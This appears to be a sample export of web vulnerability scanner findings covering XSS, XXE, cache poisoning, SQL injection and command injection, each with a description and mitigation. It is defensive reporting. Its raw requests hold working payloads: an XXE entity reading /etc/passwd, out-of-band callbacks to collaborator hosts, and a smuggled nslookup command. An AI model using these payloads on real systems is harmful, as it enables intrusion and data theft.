Row 1 (column headers): asset_target | asset_type | hostname | mac_address | title | bug_level | description | steps_to_reproduce | mitigation | severity | vulnerable_code | file_name | start_line_number | end_line_number | affected_endpoints | request | response | port | package_name | affected_versions | installed_version | fixed_version | cve_list | cwe_list | tags_list | region | aws_category | aws_account_id | cloud_type | azure_category | azure_resource
Row 2
asset_target: https://siteone.com
asset_type: 1
title: Cross-site scripting (DOM-based)
bug_level: 2
description:
DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.
DOM-based cross-site scripting arises when a script writes controllable data into the HTML document in an unsafe way. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to visit the attacker's crafted URL in various ways, similar to the usual attack delivery vectors for reflected cross-site scripting vulnerabilities.
steps_to_reproduce:
1) Step 1
2) Step 2
3) Step 3
4) Step 4
5) Step 5
6) Step 6
mitigation:
The most effective way to avoid DOM-based cross-site scripting vulnerabilities is not to dynamically write data from any untrusted source into the HTML document. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing script code into the document. In many cases, the relevant data can be validated on a whitelist basis, to allow only content that is known to be safe. In other cases, it will be necessary to sanitize or encode the data. This can be a complex task, and depending on the context that the data is to be inserted may need to involve a combination of JavaScript escaping, HTML encoding, and URL encoding, in the appropriate sequence.
severity: 5
affected_endpoints: https://siteone.com/users/?user_id=5
request:
GET /users/?user_id=5 HTTP/1.1
Host: siteone.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://siteone.com/
Connection: close
Cookie: session=4dcK7sqNQYBUau2QaGSPINQOewWDmQuf
Upgrade-Insecure-Requests: 1
Row 3
asset_target: https://sitetwo.com
asset_type: 1
title: XML external entity injection
bug_level: 2
description:
The application is vulnerable to XML external entity injection. The tag <!DOCTYPE foo [<!ENTITY xxe0wi5o SYSTEM "file:///etc/passwd"> ]> was injected into the XML sent to the server. This tag defines an external entity, xxe0wi5o, which references a file on the XML parser's filesystem. This entity was then used within a data field in the XML document. The server's response contains the contents of the specified file, indicating that the parser processed the injected external entity. Additionally, the tag <!DOCTYPE foo [<!ENTITY xxemsjgo SYSTEM "http://3tx4q4uba42hneb6gki1x6lmmds6gx4rsij59ty.burpcollaborator.net"> ]> was injected into the XML sent to the server. This tag defines an external entity, xxemsjgo, which references a URL on an external domain. The application interacted with that domain, indicating that the parser processed the injected external entity.
steps_to_reproduce:
1) Step 1
2) Step 2
3) Step 3
4) Step 4
5) Step 5
6) Step 6
mitigation:
Parsers that are used to process XML from untrusted sources should be configured to disable processing of all external resources. This is usually possible, and will prevent a number of related attacks. You should consult the documentation for your XML parsing library to determine how to achieve this.
XML external entity injection makes use of the DOCTYPE tag to define the injected entity. It may also be possible to disable the DOCTYPE tag or use input validation to block input containing it.
severity: 5
affected_endpoints: https://sitetwo.com/product/stock
request:
POST /product/stock HTTP/1.1
Host: sitetwo.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sitetwo.com/product?productId=6
Content-Type: application/xml
Content-Length: 107
Connection: close
Cookie: session=V46liKu0jgBPI1N9v1MGeVBaRyx5GBAG

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe0wi5o SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>6&xxe0wi5o;</productId><storeId>1</storeId></stockCheck>
response:
HTTP/1.1 400 Bad Request
Date: Thu, 20 Jun 2019 09:13:48 GMT
Content-Type: application/json
Content-Length: 1145
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; style-src 'self'; frame-src 'self'; connect-src 'self' ws://localhost:3333; font-src 'self'; media-src 'self'; object-src 'none'; child-src 'self' blob:
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY

"Invalid product ID: 6root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:2001:2001::/home/peter:/bin/bash
user:x:2000:2000::/home/user:/bin/bash
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:102:101::/nonexistent:/usr/sbin/nologin
"
Row 4
asset_target: https://sitethree.com
asset_type: 1
title: Web Cache Poisoning
bug_level: 2
description:
Web caches identify resources using a few specific components of each HTTP request, together known as the cache key. Two requests with the same cache key are regarded by the cache as equivalent.
Web cache poisoning vulnerabilities arise when an application behind a cache processes input that is not included in the cache key. Attackers can exploit this by sending crafted input to trigger a harmful response that the cache will then save and serve to other users.
The impact is potentially serious as the malicious cached page may be served to a large number of users without other interaction. The threat posed by this vulnerability depends largely on what can be achieved with the input. Often the input is vulnerable to XSS, or can be used to trigger a redirect to another domain. Other times, it can simply be used to swap pages around.
steps_to_reproduce:
1) Step 1
2) Step 2
3) Step 3
4) Step 4
5) Step 5
6) Step 6
mitigation:
To resolve this issue, either disable support for the affected input, or disable caching on all affected pages.
If both the affected input and caching behavior are required, configure the cache to ensure that the input is included in the cache key. Depending on which caching solution you use, if the input is in a request header it might be possible to achieve this using the Vary response header.
severity: 5
affected_endpoints: https://sitethree.com/contact-us
request:
GET /contact-us?input=foo&m0xp37ttir=1 HTTP/1.1
Host: sitethree.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitethree.com/cachepoison/
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-Host: 5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net
X-Host: 5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net
X-Forwarded-Server: 5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net
response:
HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache/2.4.9 (Unix)
Status: 200 OK
Vary: Accept-Encoding
Date: Thu, 20 Jun 2019 12:45:33 GMT
Content-Length: 60
Connection: close

5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net
Row 5
asset_target: https://sitefour.com
asset_type: 1
title: SQL Injection
bug_level: 2
description:
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
steps_to_reproduce:
1) Step 1
2) Step 2
3) Step 3
4) Step 4
5) Step 5
6) Step 6
mitigation:
The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
severity: 5
affected_endpoints: https://sitefour.com/events
request:
GET /events HTTP/1.1
Host: sitefour.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sitefour.com/product?productId=6
Connection: close
Cookie: TrackingId=38faBE1NUKTK4eYI'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20waqks%20SYSTEM%20%22http%3a%2f%2fpmfqjqnx3qv3g04s96bnqse8fzls9mxqlj89wy.burpcollab'%7c%7c'orator.net%2f%22%3e%25waqks%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'; session=pQR94ZdLkjTnh6VvIovAfZi7yqrNrjwA
Upgrade-Insecure-Requests: 1
Row 6
asset_target: https://sitefive.com
asset_type: 1
title: OS command injection
bug_level: 2
description:
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.
steps_to_reproduce:
1) Step 1
2) Step 2
3) Step 3
4) Step 4
5) Step 5
6) Step 6
mitigation:
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands other than the one intended.
severity: 5
affected_endpoints: https://sitefive.com/feedback/submit
request:
POST /feedback/submit HTTP/1.1
Host: insecure-website.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://insecure-website.com/feedback
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
Cookie: session=5AZnp7FvA6cNx16MMzwa3i3LDOAY4pvZ

csrf=AgPcq8h37cv2FtglRj4PodzvuEYOCeEz&name=test&email=test%40test.com&subject=test%26nslookup%20-q%3dcname%20dr8eoesl8e0rlo9geugbvgjwknqge621qtdm1b.burpcollaborator.net.%26'%5c%22%600%26nslookup%20-q%3dcname%20dr8eoesl8e0rlo9geugbvgjwknqge621qtdm1b.burpcollaborator.net.%26%60'&message=test